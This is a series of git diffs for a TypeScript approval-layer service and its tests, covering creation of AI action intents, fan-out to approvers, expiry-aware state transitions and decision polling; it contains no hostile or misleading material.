   dbState.insertApprovalRequestsResults.length = 0;
   dbState.selectActionIntentsResults.length = 0;
   dbState.selectApprovalRequestsResults.length = 0;
-  dbState.selectOrgUsersResults.length = 0;
   dbState.updateActionIntentsResults.length = 0;
   dbState.insertedActionIntentValues.length = 0;
   dbState.insertedApprovalRequestsValues.length = 0;
@@ -231,6 +232,7 @@ function makeIntentRow(overrides?: Record<string, unknown>) {
   return {
     id: 'intent-1',
     orgId: ORG_ID,
+    partnerId: null,
     requestedByUserId: REQUESTER_ID,
     requestingApiKeyId: null,
     source: 'chat',
@@ -276,6 +278,9 @@ beforeEach(() => {
   permState.userCanDecideApprovals.mockImplementation((perms: { canDecide?: boolean } | null) => !!perms?.canDecide);
   pushState.getUserPushTokens.mockResolvedValue([]);
   pushState.dispatchApprovalPushToTokens.mockResolvedValue({ tokensFound: 0, dispatched: 0, errors: 0 });
+  // No eligible approvers by default — tests that need a fan-out opt in via
+  // mockResolvedValueOnce.
+  intentApproversState.resolveIntentApprovers.mockResolvedValue([]);
 });
 
 // ---------------------------------------------------------------------------
@@ -316,13 +321,13 @@ describe('createActionIntent — digest stability', () => {
     const inputB = { a: { y: 3, z: 2 }, b: 1 };
     const expectedDigest = computeArgumentDigest(canonicalizeArguments(inputA));
 
-    dbState.selectOrgUsersResults.push([]);
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([]);
     dbState.insertActionIntentsResults.push([makeIntentRow({ id: 'intent-a', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
     dbState.updateActionIntentsResults.push([makeIntentRow({ id: 'intent-a', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
     await createActionIntent(makeAuth(), baseInput({ input: inputA, idempotencyKey: 'key-a' }));
     expect(dbState.insertedActionIntentValues[0]?.argumentDigest).toBe(expectedDigest);
 
-    dbState.selectOrgUsersResults.push([]);
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([]);
     dbState.insertActionIntentsResults.push([makeIntentRow({ id: 'intent-b', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
     dbState.updateActionIntentsResults.push([makeIntentRow({ id: 'intent-b', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
     await createActionIntent(makeAuth(), baseInput({ input: inputB, idempotencyKey: 'key-b' }));
@@ -364,12 +369,14 @@ describe('createActionIntent — idempotency', () => {
 describe('createActionIntent — approver fan-out', () => {
   it('excludes the requester from the fanned-out approval rows', async () => {
     dbState.insertActionIntentsResults.push([makeIntentRow()]);
-    dbState.selectOrgUsersResults.push([
-      { userId: REQUESTER_ID },
-      { userId: APPROVER_1 },
-      { userId: APPROVER_2 },
+    // resolveIntentApprovers returns the full eligible set (both axes,
+    // possibly including the requester); createActionIntent excludes the
+    // requester before fanning out.
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([
+      REQUESTER_ID,
+      APPROVER_1,
+      APPROVER_2,
     ]);
-    permState.getUserPermissions.mockImplementation(async (userId: string) => ({ userId, canDecide: true }));
     dbState.insertApprovalRequestsResults.push([{ id: 'approval-1' }, { id: 'approval-2' }]);
 
     const snapshot = await createActionIntent(makeAuth(), baseInput());
@@ -392,10 +399,8 @@ describe('createActionIntent — approver fan-out', () => {
 
   it('creates a single sole-operator row when the requester is the only eligible approver', async () => {
     dbState.insertActionIntentsResults.push([makeIntentRow()]);
-    dbState.selectOrgUsersResults.push([{ userId: REQUESTER_ID }]);
-    permState.getUserPermissions.mockImplementation(async (userId: string) =>
-      userId === REQUESTER_ID ? { userId, canDecide: true } : null,
-    );
+    // Only the requester is eligible → sole-operator single-row fan-out.
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([REQUESTER_ID]);
     dbState.insertApprovalRequestsResults.push([{ id: 'approval-solo' }]);
 
     const snapshot = await createActionIntent(makeAuth(), baseInput());
@@ -412,8 +417,8 @@ describe('createActionIntent — approver fan-out', () => {
 
   it('creates the intent then immediately cancels it when no one is eligible (not even the requester)', async () => {
     dbState.insertActionIntentsResults.push([makeIntentRow()]);
-    dbState.selectOrgUsersResults.push([{ userId: REQUESTER_ID }, { userId: APPROVER_1 }]);
-    permState.getUserPermissions.mockResolvedValue(null); // nobody passes userCanDecideApprovals
+    // Nobody is eligible — not even the requester.
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([]);
     dbState.updateActionIntentsResults.push([
       makeIntentRow({ status: 'cancelled', errorCode: 'no_eligible_approvers' }),
     ]);
@@ -449,42 +454,35 @@ describe('createActionIntent — approver fan-out', () => {
 type MockLike = { mock: { calls: unknown[][]; invocationCallOrder: number[] } };
 
 describe('createActionIntent — connection-hold (#1105)', () => {
-  it('resolves every eligible-approver permission check before the write transaction inserts the intent row', async () => {
+  it('resolves the eligible-approver set before the write transaction inserts the intent row', async () => {
     dbState.insertActionIntentsResults.push([makeIntentRow()]);
-    dbState.selectOrgUsersResults.push([
-      { userId: REQUESTER_ID },
-      { userId: APPROVER_1 },
-      { userId: APPROVER_2 },
+    // Approver resolution now lives entirely in resolveIntentApprovers, which
+    // opens its OWN system DB context (and closes it) before returning — so
+    // intentService never holds a pooled connection across the membership
+    // reads. This mock stands in for that resolver; the #1105 property we
+    // assert is that it completes before the creation write transaction opens.
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([
+      REQUESTER_ID,
+      APPROVER_1,
+      APPROVER_2,
     ]);
-    permState.getUserPermissions.mockImplementation(async (userId: string) => ({ userId, canDecide: true }));
     dbState.insertApprovalRequestsResults.push([{ id: 'approval-1' }, { id: 'approval-2' }]);
 
     await createActionIntent(makeAuth(), baseInput());
 
-    // One getUserPermissions call per org member — confirms the approver
-    // resolution actually ran (not vacuously skipped).
-    expect(permState.getUserPermissions).toHaveBeenCalledTimes(3);
+    // Resolver ran exactly once, before the intent-row insert (invocationCallOrder
+    // is a global counter shared across every vi.fn — safe to compare directly).
+    const resolverMock = intentApproversState.resolveIntentApprovers as unknown as MockLike;
+    expect(resolverMock.mock.invocationCallOrder).toHaveLength(1);
+    const resolverOrder = resolverMock.mock.invocationCallOrder[0]!;
 
     const insertMock = db.insert as unknown as MockLike;
     const intentInsertIndex = insertMock.mock.calls.findIndex((call) => call[0] === schema.actionIntentsTbl);
     expect(intentInsertIndex).toBeGreaterThanOrEqual(0);
     const intentInsertOrder = insertMock.mock.invocationCallOrder[intentInsertIndex]!;
+    expect(resolverOrder).toBeLessThan(intentInsertOrder);
 
-    // invocationCallOrder is a global counter shared across every vi.fn in
-    // the test — safe to compare directly across mocks. Every permission
-    // check's call site must precede the intent-row insert, proving
-    // resolution completed before the write transaction opened (no pooled
-    // connection held across the N sequential round-trips).
-    const permCallOrders = (permState.getUserPermissions as unknown as MockLike).mock.invocationCallOrder;
-    expect(Math.max(...permCallOrders)).toBeLessThan(intentInsertOrder);
-
-    // withDbAccessContext must have opened a distinct (earlier) context for
-    // the members read, separate from the one wrapping the creation write.
-    const wrapMock = withDbAccessContext as unknown as MockLike;
-    expect(wrapMock.mock.invocationCallOrder.length).toBeGreaterThanOrEqual(2);
-    expect(Math.max(...permCallOrders)).toBeLessThan(wrapMock.mock.invocationCallOrder[1]!);
-
-    // Fan-out outcome itself is unchanged by the reordering.
+    // Fan-out outcome itself is unchanged.
     const inserted = dbState.insertedApprovalRequestsValues[0] as Array<{ userId: string }>;
     expect(inserted.map((r) => r.userId)).toEqual([APPROVER_1, APPROVER_2]);
   });
@@ -497,8 +495,7 @@ describe('createActionIntent — connection-hold (#1105)', () => {
 describe('createActionIntent — transactional outbox', () => {
   it('writes exactly one intent_created outbox row carrying only ids, no argument content', async () => {
     dbState.insertActionIntentsResults.push([makeIntentRow()]);
-    dbState.selectOrgUsersResults.push([{ userId: APPROVER_1 }]);
-    permState.getUserPermissions.mockResolvedValue({ canDecide: true });
+    intentApproversState.resolveIntentApprovers.mockResolvedValueOnce([APPROVER_1]);
     dbState.insertApprovalRequestsResults.push([{ id: 'approval-1' }]);
 
     await createActionIntent(makeAuth(), baseInput());

--- a/apps/api/src/services/actionIntents/intentService.ts
+++ b/apps/api/src/services/actionIntents/intentService.ts
@@ -1,5 +1,5 @@
 import { randomUUID, createHash } from 'crypto';
-import { and, eq, inArray } from 'drizzle-orm';
+import { and, eq, inArray, sql } from 'drizzle-orm';
 import type { AssuranceLevel } from '@breeze/shared';
 import { db, withDbAccessContext, withSystemDbAccessContext, type DbAccessContext } from '../../db';
 import { actionIntents, intentOutbox, type ActionIntent, type ActionIntentSource, type ActionIntentStatus } from '../../db/schema/actionIntents';
@@ -556,13 +556,25 @@ export async function transitionIntent(
   from: ActionIntentStatus | ActionIntentStatus[],
   to: ActionIntentStatus,
   patch?: ActionIntentTransitionPatch,
+  opts?: { requireNotExpired?: boolean },
 ): Promise<boolean> {
   const fromList = Array.isArray(from) ? from : [from];
   return withSystemDbAccessContext(async () => {
+    // requireNotExpired folds the deadline into the CAS predicate so a release
+    // claim is atomic with the intent still being live. Without it, an intent
+    // approved just before expires_at could be claimed approved -> executing in
+    // the window before the 30s expiry reaper terminalizes it, executing an
+    // action whose authorization window has already closed. Uses the DB clock
+    // (now()) rather than a JS timestamp so the comparison is against the same
+    // clock that stamped expires_at.
+    const conditions = [eq(actionIntents.id, intentId), inArray(actionIntents.status, fromList)];
+    if (opts?.requireNotExpired) {
+      conditions.push(sql`${actionIntents.expiresAt} > now()`);
+    }
     const rows = await db
       .update(actionIntents)
       .set({ status: to, ...patch })
-      .where(and(eq(actionIntents.id, intentId), inArray(actionIntents.status, fromList)))
+      .where(and(...conditions))
       .returning({ id: actionIntents.id });
     return rows.length > 0;
   });

--- a/apps/api/src/services/actionIntents/intentService.ts
+++ b/apps/api/src/services/actionIntents/intentService.ts
@@ -222,6 +222,43 @@ export async function createActionIntent(
     userId: requesterId,
   };
 
+  // Resolve eligible approvers (org members with approvals:decide, excluding
+  // the requester — spec §4 step 4) BEFORE opening the creation transaction
+  // below. The approver set doesn't depend on the intent row existing, so
+  // there's no reason to hold a pooled connection open across N sequential
+  // getUserPermissions round-trips (the #1105 connection-hold class — see
+  // apps/api/src/db/index.ts). getUserPermissions manages its own db context,
+  // so resolving it here, outside `withDbAccessContext` below, is exactly the
+  // point; only the members read needs the caller's org context. Each
+  // permission lookup is independent, so resolve them in parallel rather than
+  // sequentially. On a genuine idempotency conflict inside the transaction,
+  // this resolved set is simply discarded — cheap relative to the round-trip
+  // savings on the common (non-conflicting) path.
+  const members = await withDbAccessContext(dbContext, () =>
+    db
+      .select({ userId: organizationUsers.userId })
+      .from(organizationUsers)
+      .where(eq(organizationUsers.orgId, orgId)),
+  );
+
+  const approverEligibility = await Promise.all(
+    members.map(async (member) => {
+      const perms = await getUserPermissions(member.userId, { orgId });
+      return { userId: member.userId, eligible: !!perms && userCanDecideApprovals(perms) };
+    }),
+  );
+
+  const eligibleApprovers: string[] = [];
+  let requesterEligible = false;
+  for (const { userId, eligible } of approverEligibility) {
+    if (!eligible) continue;
+    if (userId === requesterId) {
+      requesterEligible = true;
+      continue;
+    }
+    eligibleApprovers.push(userId);
+  }
+
   const creation = await withDbAccessContext(dbContext, async (): Promise<CreationResult> => {
     const [inserted] = await db
       .insert(actionIntents)
@@ -247,7 +284,8 @@ export async function createActionIntent(
     if (!inserted) {
       // Idempotent replay: converge on the existing row instead of creating a
       // duplicate (spec §4 step 3 / §13). No new fan-out, no new outbox row —
-      // the retry is a no-op beyond returning what already exists.
+      // the retry is a no-op beyond returning what already exists. The
+      // approver set resolved above is simply unused on this path.
       const [existing] = await db
         .select()
         .from(actionIntents)
@@ -269,25 +307,6 @@ export async function createActionIntent(
         fanOutUserIds: [],
         isNew: false,
       };
-    }
-
-    // Resolve eligible approvers: org members with approvals:decide, excluding
-    // the requester (spec §4 step 4).
-    const members = await db
-      .select({ userId: organizationUsers.userId })
-      .from(organizationUsers)
-      .where(eq(organizationUsers.orgId, orgId));
-
-    const eligibleApprovers: string[] = [];
-    let requesterEligible = false;
-    for (const member of members) {
-      const perms = await getUserPermissions(member.userId, { orgId });
-      if (!perms || !userCanDecideApprovals(perms)) continue;
-      if (member.userId === requesterId) {
-        requesterEligible = true;
-        continue;
-      }
-      eligibleApprovers.push(member.userId);
     }
 
     let approvalRequestIds: string[] = [];

--- a/apps/api/src/services/actionIntents/intentService.ts
+++ b/apps/api/src/services/actionIntents/intentService.ts
@@ -1,0 +1,487 @@
+import { randomUUID, createHash } from 'crypto';
+import { and, eq, inArray } from 'drizzle-orm';
+import type { AssuranceLevel } from '@breeze/shared';
+import { db, withDbAccessContext, withSystemDbAccessContext, type DbAccessContext } from '../../db';
+import { actionIntents, intentOutbox, type ActionIntent, type ActionIntentSource, type ActionIntentStatus } from '../../db/schema/actionIntents';
+import { approvalRequests } from '../../db/schema/approvals';
+import { organizationUsers } from '../../db/schema/users';
+import { type AuthContext, dbAccessContextFromAuth } from '../../middleware/auth';
+import { aiTools, resolveWritableToolOrgId } from '../aiTools';
+import { checkGuardrails, type GuardrailCheck } from '../aiGuardrails';
+import { getUserPermissions, userCanDecideApprovals } from '../permissions';
+import { dispatchApprovalPushToTokens, getUserPushTokens } from '../expoPush';
+import { canonicalizeArguments, computeArgumentDigest } from './canonicalize';
+import { recordActionIntentEvent } from './metrics';
+
+// Action intents & durable approval layer — core intent service (spec
+// docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+// §4, §7). Creates a digest-bound intent, fans it out to eligible approvers,
+// and provides the CAS primitive later tasks (decide handler, release worker,
+// reaper) use to move it through its state machine.
+
+// ---------------------------------------------------------------------------
+// Errors
+// ---------------------------------------------------------------------------
+
+export class ActionIntentError extends Error {
+  constructor(message: string, public code: string) {
+    super(message);
+    this.name = 'ActionIntentError';
+  }
+}
+
+/** Tier <=2 tools aren't an intent path at all; Tier 4 is refused outright. */
+export class ActionIntentTierError extends ActionIntentError {
+  constructor(message: string, code: 'tool_not_tier3' | 'tool_blocked', public tier?: number) {
+    super(message, code);
+    this.name = 'ActionIntentTierError';
+  }
+}
+
+export class ActionIntentNotFoundError extends ActionIntentError {
+  constructor(intentId: string) {
+    super(`Action intent ${intentId} not found`, 'not_found');
+    this.name = 'ActionIntentNotFoundError';
+  }
+}
+
+export class ActionIntentAuthorizationError extends ActionIntentError {
+  constructor(message: string) {
+    super(message, 'forbidden');
+    this.name = 'ActionIntentAuthorizationError';
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Public types (Tasks 5-8 + Plan 2 depend on these exact shapes)
+// ---------------------------------------------------------------------------
+
+export interface CreateActionIntentInput {
+  toolName: string;
+  input: Record<string, unknown>;
+  reason?: string;
+  source: 'chat' | 'mcp_api';
+  requestingClientLabel?: string;
+  /** MCP callers pass this explicitly; derived deterministically for chat. */
+  idempotencyKey?: string;
+  /** Resolved via resolveWritableToolOrgId when absent. */
+  orgId?: string;
+}
+
+export type ActionIntentSnapshot = {
+  id: string;
+  status: ActionIntentStatus;
+  actionName: string;
+  argumentDigest: string;
+  source: ActionIntentSource;
+  expiresAt: Date;
+  result: unknown;
+  errorCode: string | null;
+  approvalRequestIds: string[];
+};
+
+export interface ActionIntentTransitionPatch {
+  decidedAt?: Date | null;
+  decidedByUserId?: string | null;
+  decidedAssuranceLevel?: AssuranceLevel | null;
+  decidedVia?: string | null;
+  executedAt?: Date | null;
+  result?: Record<string, unknown> | null;
+  errorCode?: string | null;
+}
+
+// ---------------------------------------------------------------------------
+// Constants
+// ---------------------------------------------------------------------------
+
+// Expiry defaults (spec §3.4): chat matches the existing 5-minute
+// waitForApproval UX; mcp_api gets a day since there's no live session
+// blocking on it. Constants, not env vars, per the design.
+const CHAT_EXPIRY_MS = 5 * 60 * 1000;
+const MCP_EXPIRY_MS = 24 * 60 * 60 * 1000;
+
+const MAX_ARG_VALUE_LEN = 80;
+
+// ---------------------------------------------------------------------------
+// Summary / digest helpers
+// ---------------------------------------------------------------------------
+
+function truncate(value: string, max = MAX_ARG_VALUE_LEN): string {
+  return value.length > max ? `${value.slice(0, max)}...` : value;
+}
+
+function stringifyArgValue(value: unknown): string {
+  if (value === undefined) return 'undefined';
+  if (typeof value === 'string') return value;
+  try {
+    return JSON.stringify(value);
+  } catch {
+    return String(value);
+  }
+}
+
+/** target = tool name + top-level arg keys with values truncated to 80 chars (resolved decision). */
+function buildTargetSummary(toolName: string, input: Record<string, unknown>): string {
+  const keys = Object.keys(input);
+  if (keys.length === 0) return toolName;
+  const parts = keys.map((key) => `${key}=${truncate(stringifyArgValue(input[key]))}`);
+  return `${toolName}(${parts.join(', ')})`;
+}
+
+function firstSentence(text: string): string {
+  const match = text.match(/^[^.!?]*[.!?]/);
+  return (match ? match[0] : text).trim();
+}
+
+/** impact = first sentence of the tool description (or the guardrail description) — resolved decision. */
+function buildImpactSummary(toolName: string, guardrail: GuardrailCheck): string {
+  const definitionDescription = aiTools.get(toolName)?.definition.description;
+  const description = definitionDescription || guardrail.description || `Execute ${toolName}`;
+  return firstSentence(description);
+}
+
+function deriveIdempotencyKey(actorId: string, actionName: string, digest: string): string {
+  return createHash('sha256').update(`${actorId}:${actionName}:${digest}`).digest('hex');
+}
+
+function computeExpiresAt(source: ActionIntentSource): Date {
+  return new Date(Date.now() + (source === 'chat' ? CHAT_EXPIRY_MS : MCP_EXPIRY_MS));
+}
+
+function toSnapshot(intent: ActionIntent, approvalRequestIds: string[]): ActionIntentSnapshot {
+  return {
+    id: intent.id,
+    status: intent.status,
+    actionName: intent.actionName,
+    argumentDigest: intent.argumentDigest,
+    source: intent.source,
+    expiresAt: intent.expiresAt,
+    result: intent.result,
+    errorCode: intent.errorCode,
+    approvalRequestIds,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// createActionIntent
+// ---------------------------------------------------------------------------
+
+interface CreationResult {
+  intent: ActionIntent;
+  approvalRequestIds: string[];
+  /** userIds that received a fanned-out approval row, in the same order as approvalRequestIds — used for the post-commit push fan-out. Empty on an idempotent replay. */
+  fanOutUserIds: string[];
+  isNew: boolean;
+}
+
+export async function createActionIntent(
+  auth: AuthContext,
+  input: CreateActionIntentInput,
+): Promise<ActionIntentSnapshot> {
+  const guardrail = checkGuardrails(input.toolName, input.input);
+  if (!guardrail.allowed || guardrail.tier >= 4) {
+    throw new ActionIntentTierError(
+      `Tool "${input.toolName}" is not permitted on the action-intent path: ${guardrail.reason ?? 'blocked'}`,
+      'tool_blocked',
+      guardrail.tier,
+    );
+  }
+  if (guardrail.tier <= 2) {
+    throw new ActionIntentTierError(
+      `Tool "${input.toolName}" is tier ${guardrail.tier}; action intents are for Tier-3 approval-required tools only`,
+      'tool_not_tier3',
+      guardrail.tier,
+    );
+  }
+
+  const resolvedOrg = resolveWritableToolOrgId(auth, input.orgId);
+  if (!resolvedOrg.orgId) {
+    throw new ActionIntentError(resolvedOrg.error ?? 'Organization context required', 'org_resolution_failed');
+  }
+  const orgId = resolvedOrg.orgId;
+  const requesterId = auth.user.id;
+
+  const canonical = canonicalizeArguments(input.input);
+  const argumentDigest = computeArgumentDigest(canonical);
+  const idempotencyKey = input.idempotencyKey ?? deriveIdempotencyKey(requesterId, input.toolName, argumentDigest);
+  const targetSummary = buildTargetSummary(input.toolName, input.input);
+  const impactSummary = buildImpactSummary(input.toolName, guardrail);
+  const expiresAt = computeExpiresAt(input.source);
+  const requestingClientLabel = input.requestingClientLabel
+    ?? (input.source === 'chat' ? 'Breeze AI' : 'MCP API client');
+  // Tier → riskTier mapping mirrors aiAgentSdk.ts's mobile-approval bridge.
+  // Tier is always 3 by the time we reach here (T4 refused, T<=2 rejected
+  // above), but computed generically for forward-compat.
+  const riskTier: 'medium' | 'high' | 'critical' =
+    guardrail.tier >= 4 ? 'critical' : guardrail.tier >= 3 ? 'high' : 'medium';
+
+  const dbContext: DbAccessContext = {
+    scope: 'organization',
+    orgId,
+    accessibleOrgIds: [orgId],
+    userId: requesterId,
+  };
+
+  const creation = await withDbAccessContext(dbContext, async (): Promise<CreationResult> => {
+    const [inserted] = await db
+      .insert(actionIntents)
+      .values({
+        orgId,
+        requestedByUserId: requesterId,
+        source: input.source,
+        requestingClientLabel,
+        actionName: input.toolName,
+        arguments: input.input,
+        argumentDigest,
+        targetSummary,
+        impactSummary,
+        reason: input.reason ?? null,
+        riskTier: guardrail.tier,
+        idempotencyKey,
+        correlationId: randomUUID(),
+        expiresAt,
+      })
+      .onConflictDoNothing({ target: [actionIntents.orgId, actionIntents.idempotencyKey] })
+      .returning();
+
+    if (!inserted) {
+      // Idempotent replay: converge on the existing row instead of creating a
+      // duplicate (spec §4 step 3 / §13). No new fan-out, no new outbox row —
+      // the retry is a no-op beyond returning what already exists.
+      const [existing] = await db
+        .select()
+        .from(actionIntents)
+        .where(and(eq(actionIntents.orgId, orgId), eq(actionIntents.idempotencyKey, idempotencyKey)))
+        .limit(1);
+      if (!existing) {
+        throw new ActionIntentError(
+          'Insert conflicted on (org_id, idempotency_key) but no existing row was found',
+          'idempotency_race',
+        );
+      }
+      const approvalRows = await db
+        .select({ id: approvalRequests.id })
+        .from(approvalRequests)
+        .where(eq(approvalRequests.intentId, existing.id));
+      return {
+        intent: existing,
+        approvalRequestIds: approvalRows.map((r) => r.id),
+        fanOutUserIds: [],
+        isNew: false,
+      };
+    }
+
+    // Resolve eligible approvers: org members with approvals:decide, excluding
+    // the requester (spec §4 step 4).
+    const members = await db
+      .select({ userId: organizationUsers.userId })
+      .from(organizationUsers)
+      .where(eq(organizationUsers.orgId, orgId));
+
+    const eligibleApprovers: string[] = [];
+    let requesterEligible = false;
+    for (const member of members) {
+      const perms = await getUserPermissions(member.userId, { orgId });
+      if (!perms || !userCanDecideApprovals(perms)) continue;
+      if (member.userId === requesterId) {
+        requesterEligible = true;
+        continue;
+      }
+      eligibleApprovers.push(member.userId);
+    }
+
+    let approvalRequestIds: string[] = [];
+    let fanOutUserIds: string[] = [];
+
+    const approvalRowFor = (userId: string) => ({
+      userId,
+      requestingClientLabel,
+      actionLabel: targetSummary,
+      actionToolName: input.toolName,
+      actionArguments: input.input,
+      riskTier,
+      riskSummary: impactSummary,
+      status: 'pending' as const,
+      expiresAt,
+      intentId: inserted.id,
+      boundArgumentDigest: argumentDigest,
+      isRecursive: false,
+    });
+
+    if (eligibleApprovers.length > 0) {
+      const rows = await db
+        .insert(approvalRequests)
+        .values(eligibleApprovers.map(approvalRowFor))
+        .returning({ id: approvalRequests.id });
+      approvalRequestIds = rows.map((r) => r.id);
+      fanOutUserIds = eligibleApprovers;
+    } else if (requesterEligible) {
+      // Sole-operator branch: the only eligible approver is the requester.
+      // Create one row carrying the digest; the assurance-level >= 3 gate is
+      // enforced later, in the decide handler (Task 5), not here.
+      const rows = await db
+        .insert(approvalRequests)
+        .values([approvalRowFor(requesterId)])
+        .returning({ id: approvalRequests.id });
+      if (rows[0]) {
+        approvalRequestIds = [rows[0].id];
+        fanOutUserIds = [requesterId];
+      }
+    }
+
+    let finalIntent: ActionIntent = inserted;
+    if (approvalRequestIds.length === 0) {
+      // No eligible approvers and the requester isn't one either — fail
+      // closed: create then immediately cancel, visible in audit (spec §4
+      // step 4 / §8).
+      const [cancelled] = await db
+        .update(actionIntents)
+        .set({ status: 'cancelled', errorCode: 'no_eligible_approvers', decidedAt: new Date() })
+        .where(eq(actionIntents.id, inserted.id))
+        .returning();
+      finalIntent = cancelled ?? {
+        ...inserted,
+        status: 'cancelled',
+        errorCode: 'no_eligible_approvers',
+      };
+    }
+
+    await db.insert(intentOutbox).values({
+      intentId: inserted.id,
+      eventType: 'intent_created',
+      // Ids only, no argument content (spec §3.2).
+      payload: { intentId: inserted.id, orgId },
+    });
+
+    return { intent: finalIntent, approvalRequestIds, fanOutUserIds, isNew: true };
+  });
+
+  // Best-effort push AFTER the creation transaction commits (#1105) — never
+  // hold a DB transaction open across the push network round-trip. Token
+  // reads happen inside a fresh context per approver; the sends happen after.
+  if (creation.isNew && creation.intent.status === 'pending_approval') {
+    for (let i = 0; i < creation.approvalRequestIds.length; i++) {
+      const approvalId = creation.approvalRequestIds[i];
+      const userId = creation.fanOutUserIds[i];
+      if (!approvalId || !userId) continue;
+      try {
+        const tokens = await withDbAccessContext(dbContext, () => getUserPushTokens(userId));
+        await dispatchApprovalPushToTokens(tokens, {
+          approvalId,
+          actionLabel: targetSummary,
+          requestingClientLabel,
+        });
+      } catch (err) {
+        console.error('[intentService] approval push dispatch failed', approvalId, err);
+      }
+    }
+  }
+
+  if (creation.isNew) {
+    const cancelledForNoApprovers = creation.intent.status === 'cancelled';
+    recordActionIntentEvent({
+      orgId,
+      intentId: creation.intent.id,
+      actionName: input.toolName,
+      argumentDigest,
+      source: input.source,
+      outcome: cancelledForNoApprovers ? 'cancelled' : 'created',
+      actorId: requesterId,
+      details: cancelledForNoApprovers
+        ? { errorCode: creation.intent.errorCode ?? 'no_eligible_approvers' }
+        : {
+          approverCount: creation.approvalRequestIds.length,
+          soleOperator: creation.fanOutUserIds.length === 1 && creation.fanOutUserIds[0] === requesterId,
+        },
+    });
+  }
+
+  return toSnapshot(creation.intent, creation.approvalRequestIds);
+}
+
+// ---------------------------------------------------------------------------
+// getActionIntent
+// ---------------------------------------------------------------------------
+
+export async function getActionIntent(auth: AuthContext, intentId: string): Promise<ActionIntentSnapshot | null> {
+  const dbContext = dbAccessContextFromAuth(auth);
+  return withDbAccessContext(dbContext, async () => {
+    const [intent] = await db.select().from(actionIntents).where(eq(actionIntents.id, intentId)).limit(1);
+    if (!intent) return null;
+    const approvalRows = await db
+      .select({ id: approvalRequests.id })
+      .from(approvalRequests)
+      .where(eq(approvalRequests.intentId, intent.id));
+    return toSnapshot(intent, approvalRows.map((r) => r.id));
+  });
+}
+
+// ---------------------------------------------------------------------------
+// cancelActionIntent
+// ---------------------------------------------------------------------------
+
+export async function cancelActionIntent(
+  auth: AuthContext,
+  intentId: string,
+): Promise<{ ok: boolean; status: ActionIntentStatus }> {
+  const dbContext = dbAccessContextFromAuth(auth);
+  const intent = await withDbAccessContext(dbContext, async () => {
+    const [row] = await db.select().from(actionIntents).where(eq(actionIntents.id, intentId)).limit(1);
+    return row ?? null;
+  });
+  if (!intent) {
+    throw new ActionIntentNotFoundError(intentId);
+  }
+
+  // Requester-or-approver only (spec §6.2).
+  const isRequester = intent.requestedByUserId === auth.user.id;
+  let isApprover = false;
+  if (!isRequester) {
+    const perms = await getUserPermissions(auth.user.id, { orgId: intent.orgId });
+    isApprover = !!perms && userCanDecideApprovals(perms);
+  }
+  if (!isRequester && !isApprover) {
+    throw new ActionIntentAuthorizationError(`Not authorized to cancel action intent ${intentId}`);
+  }
+
+  const ok = await transitionIntent(intentId, ['pending_approval', 'approved'], 'cancelled');
+  if (ok) {
+    return { ok: true, status: 'cancelled' };
+  }
+
+  const current = await withDbAccessContext(dbContext, async () => {
+    const [row] = await db.select({ status: actionIntents.status }).from(actionIntents).where(eq(actionIntents.id, intentId)).limit(1);
+    return row?.status ?? intent.status;
+  });
+  return { ok: false, status: current };
+}
+
+// ---------------------------------------------------------------------------
+// transitionIntent — the CAS primitive (spec §3.4)
+// ---------------------------------------------------------------------------
+
+/**
+ * `UPDATE ... WHERE id = $1 AND status IN (...from)`. Zero rows affected
+ * (lost race / already-terminal / wrong starting state) returns `false`,
+ * never throws — callers re-read on a lost race. Runs under system scope so
+ * it works regardless of the caller's ambient context (decide handler,
+ * release worker, reaper); `withDbAccessContext` no-ops into an ALREADY
+ * active caller context rather than re-scoping it, which is fine here since
+ * `breeze_has_org_access` also authorizes system scope.
+ */
+export async function transitionIntent(
+  intentId: string,
+  from: ActionIntentStatus | ActionIntentStatus[],
+  to: ActionIntentStatus,
+  patch?: ActionIntentTransitionPatch,
+): Promise<boolean> {
+  const fromList = Array.isArray(from) ? from : [from];
+  return withSystemDbAccessContext(async () => {
+    const rows = await db
+      .update(actionIntents)
+      .set({ status: to, ...patch })
+      .where(and(eq(actionIntents.id, intentId), inArray(actionIntents.status, fromList)))
+      .returning({ id: actionIntents.id });
+    return rows.length > 0;
+  });
+}

--- a/apps/api/src/services/actionIntents/intentService.ts
+++ b/apps/api/src/services/actionIntents/intentService.ts
@@ -504,3 +504,62 @@ export async function transitionIntent(
     return rows.length > 0;
   });
 }
+
+// ---------------------------------------------------------------------------
+// waitForIntentDecision — chat SDK's blocking poll (spec §6.1)
+// ---------------------------------------------------------------------------
+
+/**
+ * Mirrors `aiAgent.ts`'s `waitForApproval` poll/backoff loop (500ms initial
+ * interval, ×1.5 backoff capped at 3s, abort-signal aware, system-scoped
+ * reads) but polls `action_intents.status` instead of
+ * `ai_tool_executions.status`, and returns the STATUS itself rather than a
+ * boolean.
+ *
+ * Unlike `waitForApproval`, this function never writes anything — a timeout
+ * simply returns the last-read status (almost always still
+ * `pending_approval`) and leaves the intent row untouched. That is the whole
+ * point of the durable design (spec §6.1): the caller (chat SDK) can give up
+ * waiting without cancelling the intent, and an approver can still decide it
+ * — and the release worker (`jobs/intentReleaseWorker.ts`) will execute it —
+ * after this session has moved on or died.
+ *
+ * Returns as soon as the status leaves `pending_approval` (any of
+ * approved/executing/completed/failed/rejected/expired/cancelled), so a
+ * caller only needs to special-case `pending_approval` to detect "still
+ * waiting" vs. "a decision (or a worker) already moved this."
+ */
+export async function waitForIntentDecision(
+  intentId: string,
+  timeoutMs: number,
+  signal?: AbortSignal,
+): Promise<ActionIntentStatus> {
+  const startTime = Date.now();
+  let pollInterval = 500;
+  let lastStatus: ActionIntentStatus = 'pending_approval';
+
+  while (Date.now() - startTime < timeoutMs) {
+    if (signal?.aborted) return lastStatus;
+
+    try {
+      const [row] = await withSystemDbAccessContext(() =>
+        db
+          .select({ status: actionIntents.status })
+          .from(actionIntents)
+          .where(eq(actionIntents.id, intentId))
+          .limit(1),
+      );
+
+      if (!row) return lastStatus;
